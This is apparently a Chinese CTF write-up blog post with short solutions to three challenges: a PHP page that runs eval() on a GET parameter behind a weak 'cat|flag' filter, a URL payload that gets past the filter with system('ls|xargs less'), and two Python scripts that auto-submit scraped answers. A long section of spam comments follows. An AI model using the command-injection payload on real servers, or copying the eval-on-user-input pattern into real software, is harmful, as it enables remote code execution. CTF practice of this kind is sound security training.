CTF

博主： admin
发布时间：2022 年 01 月 23 日
4888 次浏览
58 条评论
668字数
分类： other

<?php
//flag in flag.php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){
    $cmd = $_GET['cmd'];
    if(preg_match('/cat|flag/i', $cmd)){
        die('no no no');
    }else{
        eval($cmd);
    }
}
?>

payload?cmd=system(%27ls|xargs%20less%27);<?php
//flag in flag.php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){
$cmd = $_GET['cmd'];
if(preg_match('/cat|flag/i', $cmd)){
die('no no no');
}else{
eval($cmd);
}
}
?>

<?php
//flag in flag.php
highlight_file(__FILE__);
if(isset($_GET['cmd'])){

$cmd = $_GET['cmd'];
if(preg_match('/cat|flag/i', $cmd)){
    die('no no no');
}else{
    eval($cmd);
}

}
?>

听说你单身了十八年？
那你肯定能把这段文字复制下来发给我吧？

payload

import requests
import re
url=''
r = requests.session()
requestpage = r.get(url)
ans = re.findall(';">(.*?)</div>', requestpage.text)
data={'randomstring':ans[2]}
flag=r.post(url, data=data)
print(flag.text)

听说你能力堪比人形计算机？
那你肯定能把这个式子算出来发给我吧？

payload

import requests
import re
url=''
r = requests.session()
requestpage = r.get(url)
ans1 = re.findall(';">(.*?) =', requestpage.text)[0]
asd = eval(ans1)
data={'math_result':asd}
flag=r.post(url, data=data)
print(flag.text)

最后修改：2022 年 01 月 23 日

如果觉得我的文章对你有用，请随意赞赏

58 条评论

1
April 25th, 2023 at 08:41 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:41 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:41 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:41 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:39 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:39 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:39 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:39 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:35 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:35 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:35 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:32 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:32 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:32 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:30 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:30 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:30 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:20 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:20 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:20 pm

该评论仅登录用户及评论双方可见

回复
1
April 25th, 2023 at 08:20 pm

该评论仅登录用户及评论双方可见

回复
mlux吊长28cm
April 12th, 2023 at 03:39 pm

6666666

回复
xxx
November 11th, 2022 at 01:55 pm

测试

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
我爱你
April 30th, 2022 at 06:52 pm

我爱你

回复
adsasd
April 18th, 2022 at 10:53 pm

adsasasasasdds

回复
test
April 18th, 2022 at 10:52 pm

11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

回复
tt
April 18th, 2022 at 09:03 am

😁😁😁😁

回复
bb
April 18th, 2022 at 09:03 am

回复
bb
April 18th, 2022 at 09:02 am

回复
1. xaxt
  March 28th, 2023 at 10:37 pm
  
  @bb
  
  OωO
  
  回复